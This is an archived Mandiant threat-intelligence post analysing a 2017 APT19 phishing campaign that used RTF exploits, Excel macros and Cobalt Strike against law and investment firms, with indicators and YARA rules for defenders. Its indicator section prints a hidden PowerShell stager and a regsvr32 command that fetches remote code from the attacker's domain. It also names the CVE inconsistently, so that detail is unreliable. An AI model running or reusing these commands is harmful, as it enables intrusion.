Privileges and Credentials: Phished at the Request of Counsel |
Mandiant
By Mandiant
Published: 2017-06-06 · Archived: 2026-04-05 12:50:31 UTC
Summary
In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment
firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with
some degree of sponsorship by the Chinese government.
APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures
leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199.
Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the
most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one
observed phishing lure delivered a Cobalt Strike payload.
As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we
cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment
firms for competitive economic purposes.
This purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide
technical indicators that their IT personnel can use for proactive hunting and detection.
The Emails
APT19 phishing emails from this campaign originated from sender email accounts from the "@cloudsend[.]net"
domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for
more details.
The Attachments
APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their
initial exploits. The following sections describe the two methods in further detail.
RTF Attachments
Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099, the observed RTF
attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer
hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of
the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 1 of 14

XLSM Attachments
The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The
attachments also contained an image that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files
(MD5:30f149479c02b741e897cdb9ecd22da7).
One of the malicious XLSM attachments that we observed contained a macro that:
1. Determined the system architecture to select the correct path for PowerShell
2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique
used by Meterpreter stagers.
Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 2 of 14

Figure 4 contains the decoded output of the encoded text.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 3 of 14

Figure 4: Decoded ZLIB + Base64 payload
The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root
of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is
executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with
minimal HTTP headers.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 4 of 14

Figure 5: GET Request with minimal HTTP headers
Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out
network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.
Figure 6: Decoded shellcode
FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.
Figure 7: Alternate macro
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 5 of 14

This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in
Figure 8.
Figure 8: Application Whitelisting Bypass
The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.
Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike
payload.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 6 of 14

Figure 10: Decoded SCT contents
A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar
network indicators, shown in Figure 11.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 7 of 14

Figure 11: $var_code to ASCII
Second Stage Payload
Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload,
configured with the following parameters:
Process Inject Targets:
%windir%\syswow64\rundll32.exe
%windir%\sysnative\rundll32.exe
c2_user_agents
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts;
IE0006_ver1;EN_GB)
Named Pipes
\\%s\pipe\msagent_%x
beacon_interval
60
C2
autodiscover.2bunny[.]com/submit.php
autodiscover.2bunny[.]com/IE9CompatViewList.xml
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
C2 Port
TCP/80
Figure 12 depicts an example of a BEACON C2 attempt from this payload.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 8 of 14

Figure 12: Cobalt Strike BEACON C2
FireEye Product Detections
The following FireEye products currently detect and block the methods described above. Table 1 lists the current
detection and blocking capabilities by product.
Detection Name Product Action Notes
SUSPICIOUS POWERSHELL USAGE
(METHODOLOGY)
HX Detect
XSLM Macro
launch
Gen:Variant.Application.HackTool.CobaltStrike.1 HX Detect
XSLM Macro
launch
Malware Object HX Detect
BEACON written to
disk
Backdoor.BEACON NX Block* BEACON Callback
FE_Malformed_RTF EX/ETP/NX Block* RTF
Malware.Binary.rtf EX/ETP/NX Block* RTF
Malware.Binary EX/ETP/NX Block* RTF
Malware.Binary.xlsx EX/ETP/NX Block* XSLM
Table 1: Detection review
*Appliances must be configured for block mode.
Recommendations
FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:
1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already
installed it.
2. Search historic and future emails that match the included indicators of compromise.
3. Review web proxy logs for connections to the included network based indicators of compromise.
4. Block connections to the included fully qualified domain names.
5. Review endpoints for the included host based indicators of compromise.
Indicators of Compromise
The following section provides the IOCs for the variants of the phishing emails and malicious payloads that
FireEye has observed during this campaign.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 9 of 14

Email Senders
PressReader <infodept@cloudsend[.]net> </infodept@cloudsend[.]net>
Angela Suh <angela.suh@cloudsend[.]net> </angela.suh@cloudsend[.]net>
Ashley Safronoff <ashley.safronoff@cloudsend[.]net> </ashley.safronoff@cloudsend[.]net>
Lindsey Hersh <lindsey.hersh@cloudsend[.]net> </lindsey.hersh@cloudsend[.]net>
Sarah Roberto sarah.roberto@cloudsend[.]net
noreply@cloudsend[.]net
Email Subject Lines
Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
Macron Document Leaker Releases New Images, Promises More Information
Are Emmanuel Macron's Tax Evasion Documents Real?
Time Allocation
Vacancy Report
china paper table and graph
results with zeros – some ready not all finished
Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
Macron_Authenticity.doc.rtf
Macron_Information.doc.rtf
US and EU Trade with China and China CA.xlsm
Tables 4 5 7 Appendix with zeros.xlsm
Project Codes - 05.30.17.xlsm
Weekly Vacancy Status Report 5-30-15.xlsm
Macron_Tax_Evasion.doc.rtf
Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
lyncdiscover.2bunny[.]com
autodiscover.2bunny[.]com
lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
lyncdiscover.2bunny[.]com/Autodiscover
autodiscover.2bunny[.]com/K5om
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
tk-in-f156.2bunny[.]com
tk-in-f156.2bunny[.]com/Agreement.doc
104.236.77[.]169
138.68.45[.]9
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 10 of 14

162.243.143[.]145
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts;
IE0006_ver1;EN_GB)
tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)
RTF MD5 hash values
0bef39d0e10b1edfe77617f494d733a8
0e6da59f10e1c4685bb5b35a30fc8fb6
cebd0e9e05749665d893e78c452607e2
XLSX MD5 hash values
38125a991efc6ab02f7134db0ebe21b6
3a1dca21bfe72368f2dd46eb4d9b48c4
30f149479c02b741e897cdb9ecd22da7
BEACON and Meterpreter payload MD5 hash values
bae0b39197a1ac9e24bdf9a9483b18ea
1151619d06a461456b310096db6bc548
Process arguments, named pipes, and file paths
powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader
($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String("")
regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
\\\pipe\msagent_<4 digits>
C:\Documents and Settings\\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original
GET request)
Yara Rules
rule FE_LEGALSTRIKE_MACRO {
 meta:version=".1"
 filetype="MACRO"
 author="Ian.Ahl@fireeye.com @TekDefense"
 date="2017-06-02"
 description="This rule is designed to identify macros with the specific encoding used in the sample 30f14
strings:
 // OBSFUCATION
 $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & Chr
 $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 11 of 14

$ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW
 $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(
 $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(
 $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(
 $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & Ch
 $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW
 $obreg1 = /(\w{5}\s&\s){7}\w{5}/
 $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
 // wscript
 $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
 $wsobj2 = "Obj.Run " ascii wide
condition:
 (
 (
 (uint16(0) != 0x5A4D)
 )
 and
 (
 all of ($wsobj*) and 3 of ($ob*)
 or
 all of ($wsobj*) and all of ($obreg*)
 )
 )
}
rule FE_LEGALSTRIKE_MACRO_2 {
 meta:version=".1"
 filetype="MACRO"
 author="Ian.Ahl@fireeye.com @TekDefense"
 date="2017-06-02"
 description="This rule was written to hit on specific variables and powershell command fragments as seen
strings:
 // Setting the environment
 $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
 $env2 = "windir = Environ(\"windir\")" ascii wide
 $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
 // powershell command fragments
 $ps1 = "-NoP" ascii wide
 $ps2 = "-NonI" ascii wide
 $ps3 = "-W Hidden" ascii wide
 $ps4 = "-Command" ascii wide
 $ps5 = "New-Object IO.StreamReader" ascii wide
 $ps6 = "IO.Compression.DeflateStream" ascii wide
 $ps7 = "IO.MemoryStream" ascii wide
 $ps8 = ",$([Convert]::FromBase64String" ascii wide
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 12 of 14

$ps9 = "ReadToEnd();" ascii wide
 $psregex1 = /\W\w+\s+\s\".+\"/
condition:
 (
 (
 (uint16(0) != 0x5A4D)
 )
 and
 (
 all of ($env*) and 6 of ($ps*)
 or
 all of ($env*) and 4 of ($ps*) and all of ($psregex*)
 )
 )
}
rule FE_LEGALSTRIKE_RTF {
 meta:
 version=".1"
 filetype="MACRO"
 author="joshua.kim@FireEye.com"
 date="2017-06-02"
 description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDO
 strings:
 $header = "{\\rt"
 $lnkinfo = "4c0069006e006b0049006e0066006f"
 $encoded1 = "4f4c45324c696e6b"
 $encoded2 = "52006f006f007400200045006e007400720079"
 $encoded3 = "4f0062006a0049006e0066006f"
 $encoded4 = "4f006c0065"
 $http1 = "68{"
 $http2 = "74{"
 $http3 = "07{"
 // 2bunny.com
 $domain1 = "32{\\"
 $domain2 = "62{\\"
 $domain3 = "75{\\"
 $domain4 = "6e{\\"
 $domain5 = "79{\\"
 $domain6 = "2e{\\"
 $domain7 = "63{\\"
 $domain8 = "6f{\\"
 $domain9 = "6d{\\"
 $datastore = "\\*\\datastore"
 condition:
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 13 of 14

$header at 0 and all of them
}
Acknowledgements
Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin
Prosco, Christopher Glyer
Posted in
Threat Intelligence
Security & Identity
Source: https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 14 of 14